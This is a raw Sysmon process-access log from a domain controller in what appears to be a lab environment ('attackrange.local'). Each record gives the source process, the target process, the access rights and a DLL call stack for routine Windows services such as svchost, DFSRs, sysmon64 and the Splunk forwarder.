15:51:17.253{D28789B6-7C64-5FA1-1000-000000008801}11441944C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-3700-000000008801}3084C:\Windows\system32\DFSRs.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+261b7|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+6114b|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001853Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.253{D28789B6-7C64-5FA1-1000-000000008801}11441944C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-3700-000000008801}3084C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+25d35|C:\Windows\system32\wbem\wmiprvsd.dll+2619d|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+6114b|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000001852Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.253{D28789B6-7C64-5FA1-1000-000000008801}11441944C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-3700-000000008801}3084C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+6114b|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac 10341000x80000000000000001851Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.253{D28789B6-7C64-5FA1-1000-000000008801}11441944C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-3700-000000008801}3084C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+6114b|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c 10341000x80000000000000001850Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.253{D28789B6-7C64-5FA1-1000-000000008801}11441944C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-3700-000000008801}3084C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+5a1b8|C:\Windows\system32\wbem\wmiprvsd.dll+35a49|C:\Windows\system32\wbem\wmiprvsd.dll+2807f|C:\Windows\system32\wbem\wmiprvsd.dll+29591|C:\Windows\system32\wbem\wmiprvsd.dll+292c2|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+6114b|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c 10341000x80000000000000001849Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.253{D28789B6-7C64-5FA1-1000-000000008801}11441944C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-3700-000000008801}3084C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+264a1|C:\Windows\system32\wbem\wmiprvsd.dll+2669f|C:\Windows\system32\wbem\wmiprvsd.dll+25c4b|C:\Windows\system32\wbem\wmiprvsd.dll+27476|C:\Windows\system32\wbem\wmiprvsd.dll+27db2|C:\Windows\system32\wbem\wmiprvsd.dll+277c9|C:\Windows\system32\wbem\wmiprvsd.dll+26100|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+6114b|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac 10341000x80000000000000001848Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.253{D28789B6-7C73-5FA1-3700-000000008801}30843400C:\Windows\system32\DFSRs.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmidcprv.dll+163a4|C:\Windows\system32\wbem\wmidcprv.dll+166e0|C:\Windows\system32\wbem\wmidcprv.dll+abad|C:\Windows\system32\wbem\wmidcprv.dll+b57e|C:\Windows\system32\DFSRs.exe+d839d|C:\Windows\system32\DFSRs.exe+c2ea|C:\Windows\system32\DFSRs.exe+50e1|C:\Windows\system32\DFSRs.exe+72d2|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001847Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.238{D28789B6-7C64-5FA1-1000-000000008801}11441944C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-3700-000000008801}3084C:\Windows\system32\DFSRs.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+261b7|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+6114b|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001846Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.238{D28789B6-7C64-5FA1-1000-000000008801}11441944C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-3700-000000008801}3084C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+25d35|C:\Windows\system32\wbem\wmiprvsd.dll+2619d|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+6114b|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000001845Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.238{D28789B6-7C64-5FA1-1000-000000008801}11441944C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-3700-000000008801}3084C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+6114b|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac 10341000x80000000000000001844Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.238{D28789B6-7C64-5FA1-1000-000000008801}11441944C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-3700-000000008801}3084C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+6114b|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c 10341000x80000000000000001843Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.238{D28789B6-7C64-5FA1-1000-000000008801}11441944C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-3700-000000008801}3084C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+5a1b8|C:\Windows\system32\wbem\wmiprvsd.dll+35a49|C:\Windows\system32\wbem\wmiprvsd.dll+2807f|C:\Windows\system32\wbem\wmiprvsd.dll+29591|C:\Windows\system32\wbem\wmiprvsd.dll+292c2|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+6114b|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c 10341000x80000000000000001842Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.238{D28789B6-7C73-5FA1-3700-000000008801}30843400C:\Windows\system32\DFSRs.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmidcprv.dll+163a4|C:\Windows\system32\wbem\wmidcprv.dll+166e0|C:\Windows\system32\wbem\wmidcprv.dll+abad|C:\Windows\system32\wbem\wmidcprv.dll+b57e|C:\Windows\system32\DFSRs.exe+d839d|C:\Windows\system32\DFSRs.exe+c0dd|C:\Windows\system32\DFSRs.exe+50e1|C:\Windows\system32\DFSRs.exe+72d2|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001841Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.222{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C75-5FA1-4B00-000000008801}3904C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001840Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.222{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001839Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.222{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001838Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.222{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001837Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.222{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001836Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.222{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001835Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.222{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001834Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.222{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001833Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.222{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001832Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.222{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7C75-5FA1-4B00-000000008801}3904C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001831Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.222{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntd